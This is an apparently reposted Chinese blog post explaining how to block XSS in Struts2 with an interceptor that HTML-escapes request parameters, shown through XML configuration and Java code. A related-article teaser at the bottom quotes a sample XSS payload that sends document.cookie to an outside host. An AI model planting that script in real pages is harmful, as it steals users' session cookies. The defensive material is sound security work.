struts解决xss攻击

最新推荐文章于 2024-07-10 15:30:25 发布
最新推荐文章于 2024-07-10 15:30:25 发布
阅读量877 收藏 1
点赞数
分类专栏: Java 网络安全 文章标签: xss
原文链接:https://www.yisu.com/ask/1029.html
版权

struts解决xss攻击

struts解决xss攻击的方法:

1.采用struts2的拦截器过滤,将提交上来的参数转码来解决,例如配置struts.xml,代码如下:
下面展示一些 内联代码片

<package name="default" namespace="/" extends="struts-default, json-default">
    <!-- 配置拦截器 -->
    <interceptors>

      <!-- 定义xss拦截器 -->
      <interceptor name="xssInterceptor" class="...此处填写拦截器类名"></interceptor>

      <!-- 定义一个包含xss拦截的拦截栈 -->
      <interceptor-stack name="myDefault">
        <interceptor-ref name="xssInterceptor"></interceptor-ref>
        <interceptor-ref name="defaultStack"></interceptor-ref>
      </interceptor-stack>
    </interceptors>

    <!-- 这个必须配置,否则拦截器不生效 -->
    <default-interceptor-ref name="myDefault"></default-interceptor-ref>

    <action>
    ...此处省略n个action
    </action>
</package>

2.使用Java代码,拦截器实现类,例如:

import java.util.Map;
import org.apache.commons.lang3.StringEscapeUtils;
import com.opensymphony.xwork2.ActionContext;
import com.opensymphony.xwork2.ActionInvocation;
import com.opensymphony.xwork2.interceptor.AbstractInterceptor;

public class XssInterceptor extends AbstractInterceptor {
  @Override
  public String intercept(ActionInvocation invocation) throws Exception {
    // TODO Auto-generated method stub
    ActionContext actionContext = invocation.getInvocationContext();
    Map<String, Object> map = actionContext.getParameters();
    for (Map.Entry<String, Object> entry : map.entrySet()) {
      String value = ((String[])(entry.getValue()))[0];
      entry.setValue(StringEscapeUtils.escapeHtml4(value));//将提交上来的字符串进行转码
      //System.out.println((entry.getValue()));
    }
    return invocation.invoke();
  }
}
点滴进步
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2拦截器添加及xss攻击的处理
彬哥哥的博客
06-21 5340
struts2拦截器添加及xss攻击的处理
跨站脚本漏洞
weixin_46729085的博客
09-08 3764
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
最新发布
qq_37996327的博客
07-10 447
struts2如何防止XSS脚本攻击(XSS防跨站脚本攻击过滤器)
java struts2防止xss_拦截过滤防御XSS攻击 -- Struts2.3 以及 2.5 的解决方式
weixin_34481252的博客
02-13 658
使用Struts2框架开发的后台在防御XSS攻击的时候很多方式都不能用,因为Struts2对请求进行的二次封装有区别。以下针对Struts2的XSS攻击进行拦截过滤防御解决Struts2.3本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。配置struts.xml:...此处省略n个actionJava代码,拦截器实现类:importjava.util.Map;importorg...
struts2 预防xss攻击
weixin_42070436的博客
09-19 2153
struts2 预防xss攻击什么是XSS攻击举个例子代码 最近接触了一个比较老的项目用的ssh框架 甲方测试提出了这个xss漏洞 什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种...
Struts网站基于Filter的XSS漏洞修复
乔布斯基的博客
06-25 2056
1,关于XSS漏洞的知识,网上有很多文档,例如点击打开链接 2,关于XSS漏洞修复的知识也有很多,本文对本人修复XSS做下记录 3,Spring 中 XSS漏洞修复的可以参考 点击打开链接 4,但是以上方法仅仅适用于Spring 的修复,Struct有自己的拦截包装机制,完整的 Struct 中 Xss 漏洞修复,可以参考 点击打开链接 5,但是以上对Struct中Xss漏洞修复的代码有点
基于Struts2修复XSS漏洞(博主验证有效)
weixin_42210904的博客
07-21 1484
--------------------------------------------------------XSSFilter --------------------------------------------------- package com.itcast.filter; import com.itcast.utils.XssRequestWrappers; import javax.servlet.*; import javax.servlet.http.HttpServletReq.
struts防止xss攻击_常见Web攻击技术
weixin_39633954的博客
12-01 256
常见Web攻击技术一、跨站脚本攻击概念跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript攻击原理例如有一个论坛网站,攻击者可以在上面发布以下内容:location.href="//domain.com/?c=" + document.cookie之后该内容可能会被渲染成以下形式:locat...
Struts2.3 以及 2.5 过滤 xss攻击 的一种解决方案
热门推荐
huplion的专栏
10-09 1万+
本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml<package name="default" namespace="/" extends="struts-default, json-default"> <!-- 配置拦截器 --> <interceptors> <!-- 定义xss
JSP Struts过滤xss攻击解决办法
01-08
JSP Struts过滤xss攻击解决办法 本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。 配置struts.xml extends=struts-default,> <!-- 配置拦截器 --> <!-- 定义xss拦截器 --> ...
Struts2.3.32
03-09
- **安全性**: 使用Struts 2.3.32时,应关注官方发布的安全公告,并及时应用最新的补丁来保护应用程序免受攻击。 - **性能调优**: 结合具体的应用场景,可以通过调整配置参数等方式进一步优化性能。 - **学习资源**:...
Struts-2.3.34.zip
05-22
8. **安全性**:Struts 2 版本 `2.3.34` 可能包括了对之前版本中发现的安全漏洞的修复,例如防止跨站脚本攻击(XSS)和跨站请求伪造(CSRF)等。 9. **测试支持**:Struts 2 友好地支持单元测试和集成测试,可以...
JAVAWeb框架Struts2
12-22
关于安全性,Struts2 2.5版本引入了多项改进,包括修复已知的安全漏洞,强化了输入验证,提升了对CSRF(跨站请求伪造)和XSS(跨站脚本攻击)的防护。同时,2.5版本还优化了性能,减少了内存消耗,提升了处理速度。 ...
java struts2防止xss_JSP Struts过滤xss攻击解决办法
weixin_42298802的博客
02-13 282
JSP Struts过滤xss攻击解决办法本方案采用struts2的拦截器过滤,将提交上来的参数转码来解决。配置struts.xmlextends="struts-default, json-default">...此处省略n个actionJava代码,拦截器实现类import java.util.Map;import org.apache.commons.lang3.StringEsca...
Struts2 Xss 攻击预防的处理
hello world!
12-15 2870
摘要: 关于XSS问题的处理,此前在博客 http://blog.csdn.net/catoop/article/details/50338259 中写过处理方法。刚好最近朋友有问到“在Struts2中按文章中那样处理无效”,后来验证了下发现,Struts2 对请求的二次封装有所不同,于是针对Struts. 关于XSS问题的处理,此前在博客 http://blog.csdn.net/ca
java防止xss攻击(过滤器)
meat_eating的博客
11-08 3015
java防止xss攻击
Spring Boot XSS 攻击过滤插件使用
冷冷的博客
12-03 1260
XSS 是什么 XSS(Cross Site Scripting)攻击全称跨站脚本攻击,为了不与 CSS(Cascading Style Sheets)名词混淆,故将跨站脚本攻击简称为 XSSXSS 是一种常见 web 安全漏洞,它允许恶意代码植入到提供给其它用户使用的页面中。 xss 攻击流程 简单 xss 攻击示例 若网站某个表单没做相关的处理,用户提交相关恶意代码,浏览器会执行相关的代码。 解决方案 XSS 过滤说明 对表单绑定的字符串类型进行 xss 处理。 对 json 字符串数据进行
struts2配置xss拦截器
05-13
Struts2 中,可以使用拦截器来防止 XSS 攻击。以下是一些步骤: 1. 创建一个类,继承 org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter。 ```java public class XSSFilter extends ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值